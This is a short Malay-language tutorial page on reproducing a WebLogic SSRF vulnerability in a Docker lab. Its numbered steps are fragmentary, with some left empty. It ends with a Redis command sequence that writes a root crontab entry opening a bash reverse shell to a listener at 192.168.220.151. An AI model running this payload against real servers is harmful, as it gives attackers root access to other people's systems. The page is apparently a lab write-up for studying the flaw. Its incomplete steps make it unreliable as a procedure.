Rumah > Artikel > Operasi dan penyelenggaraan > Cara Menghasilkan Semula Kerentanan SSRF Weblogic
Cara Menghasilkan Semula Kerentanan SSRF Weblogic
- 王林ke hadapan
- 2023-05-14 20:04:041383semak imbas
1. Gunakan docker untuk membina persekitaran
Pemasangan docker dan tutorial membina persekitaran: https://www.freebuf.com/sectool/252257.html
Akses port 7001
2. Langkah-langkah Pengeluaran Semula Kerentanan
1.
2. Semak tempat IBM
3 tangkap paket. Klik Cari
<.>5. Hasil capaian
Mengakses pengembalian port yang tidak wujud tidak dapat disambungkan melalui HTTP
Mengakses port sedia ada mengembalikan kod status
Akses intranet
Gunakan redis untuk melantunkan muatan shell
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
Atas ialah kandungan terperinci Cara Menghasilkan Semula Kerentanan SSRF Weblogic. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!
Kenyataan:
Artikel ini dikembalikan pada:yisu.com. Jika ada pelanggaran, sila hubungi admin@php.cn Padam
Artikel sebelumnya:Bagaimana untuk melaksanakan tatasusunan dipetakan tanpa map() dalam JavascriptArtikel seterusnya:Bagaimana untuk melaksanakan tatasusunan dipetakan tanpa map() dalam Javascript
Artikel berkaitan
Lihat lagi- Bagaimana untuk mengeksport perpustakaan yang diperlukan oleh projek dalam python
- Bagaimana untuk mengoptimumkan pelaksanaan dan aplikasi teknologi pengkomputeran yang dipercayai?
- Bagaimana untuk melaksanakan analisis kawalan NAT firewall
- Apakah butiran yang perlu diberi perhatian dalam ujian web?
- Bagaimana untuk mengawal keganasan dalam talian?